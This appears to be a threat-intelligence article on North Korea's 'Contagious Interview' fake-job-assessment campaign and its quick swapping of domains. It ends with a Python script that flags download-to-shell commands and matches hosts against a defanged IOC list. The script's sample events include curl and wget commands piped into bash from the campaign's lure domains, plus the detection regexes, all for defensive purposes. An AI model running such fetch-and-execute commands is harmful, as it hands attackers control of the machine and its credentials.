North Korean Cyber Threat Actors Unveil Strategies for Replacing Infrastructure with New Assets
Over the past year, cybersecurity researchers have noted a significant increase in activity from North Korean threat actors employing advanced social engineering techniques to target professionals in the cryptocurrency sector. This campaign, known as Contagious Interview, hides the delivery of sophisticated malware inside a seemingly innocuous job-application process. Victims receive invitations to take part in mock assessments for non-existent roles, and the assessment ultimately leads them to execute malicious scripts themselves. The attackers operate a vast network of infrastructure, swiftly replacing domains and servers that have been exposed or taken down in order to evade disruption and keep engagement levels high. In early 2025, they began registering domains like SkillQuestions[.]com and TalentCheck[.]pro, creating lure websites that prompt candidates to run shell commands under the pretext of troubleshooting errors. During these assessments an on-page error, often a camera-access prompt, directs victims to paste a curl command into their terminal; running it results in a full compromise, as the malware establishes persistent access and exfiltrates credentials.
The meticulous orchestration of these tactics, combined with tailored domain names, has led to over 230 confirmed victim engagements within a three-month timeframe. Analysts from SentinelLABS have observed that these operations rely on continuous monitoring of threat intelligence platforms such as Validin and VirusTotal. By registering community accounts shortly after new Indicators of Compromise (IOCs) are published in repositories like Maltrail's APT_Lazarus[.]txt, the adversaries ensure they remain informed about how much of their infrastructure has been exposed. Instead of making extensive modifications to existing assets, they prefer to deploy entirely new servers whenever a domain is disrupted, favouring operational agility over hardening what they already run. SentinelLABS researchers have identified that the infrastructure replacement cycle takes hours rather than weeks. When a service provider disables a domain, the threat actors promptly provision a new domain, migrate their malware distribution servers, and update command-and-control endpoints. Coordination among the team occurs through collaboration platforms like Slack, where automated bots share summaries of new domains, allowing individual operators to pick up these updates quickly.
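The two defender-side takeaways from the report are the "paste this curl command into your terminal" step and the short shelf life of each lure domain, which makes fast ingestion of published IOC lists matter. The script below is an added example (not SentinelLABS's or Maltrail's code): it loads a defanged IOC list in the style of a public feed, refangs it, and scans process-creation events for downloads piped straight into a shell or substituted into `sh -c`, tagging any event that touches a listed host. The feed contents and the log events are constructed for illustration; the two domain names are the ones named in the report, and the regular expressions are assumptions that approximate the command pattern rather than a published signature.

```python
"""Added example: flag download-to-shell execution and match hosts against a
defanged IOC feed. Sample feed and events are constructed; the two domains
come from the report, the other hostnames are placeholders."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample feed in the defanged style used by public IOC lists.
IOC_FEED = """
# constructed sample, not the real APT_Lazarus.txt
SkillQuestions[.]com
TalentCheck[.]pro
"""

# Constructed process-creation events as (pid, command line) pairs.
SAMPLE_EVENTS = [
    ("1001", "curl -fsSL https://skillquestions.com/fix/camera.sh | bash"),
    ("1002", "curl -s https://example.invalid/latest.txt -o /tmp/latest.txt"),
    ("1003", "bash -c \"$(curl -s https://talentcheck.pro/setup)\""),
    ("1004", "git pull origin main"),
    ("1005", "wget -qO- http://skillquestions.com/s | sh"),
    ("1006", "curl -sSf https://sh.example.invalid/install | sh"),
    ("1007", "curl -s https://talentcheck.pro/assessment -o /tmp/a"),
]

# Download tool whose output is piped into a shell (optionally via sudo).
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.I)
# Download tool substituted into `sh -c "$(...)"`.
SUBST_TO_SHELL = re.compile(r"\b(ba|z)?sh\s+-c\s+[\"']?\$\((curl|wget)\b", re.I)
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def refang(indicator: str) -> str:
    """Turn a defanged feed entry back into a matchable hostname."""
    return indicator.strip().lower().replace("[.]", ".").replace("hxxp", "http")


def load_iocs(feed: str) -> set[str]:
    """Parse a feed, skipping blank lines and '#' comments."""
    return {
        refang(line)
        for line in feed.splitlines()
        if line.strip() and not line.lstrip().startswith("#")
    }


@dataclass
class Finding:
    pid: str
    reason: str
    host: str | None
    ioc_hit: bool


def analyze(events, iocs: set[str]) -> list[Finding]:
    """Return one Finding per event that shows download-to-shell behaviour
    or contacts a host on the IOC list."""
    findings: list[Finding] = []
    for pid, cmd in events:
        m = HOST.search(cmd)
        host = m.group(1).lower() if m else None
        ioc_hit = host in iocs if host else False
        if PIPE_TO_SHELL.search(cmd):
            reason = "download piped directly into a shell"
        elif SUBST_TO_SHELL.search(cmd):
            reason = "download substituted into shell -c"
        elif ioc_hit:
            reason = "contact with known IOC host"
        else:
            continue
        findings.append(Finding(pid, reason, host, ioc_hit))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS, load_iocs(IOC_FEED)):
        flag = "IOC" if f.ioc_hit else "   "
        print(f"[{flag}] pid={f.pid} host={f.host} {f.reason}")
```

The pipe-to-shell patterns fire regardless of whether the host is already on a feed, which is the point: the report shows lure domains being replaced within hours, so a rule keyed only on known domains lags the attacker, while the "curl into bash from an interactive terminal" behaviour is stable across the whole campaign. The IOC match is kept as a secondary enrichment for triage.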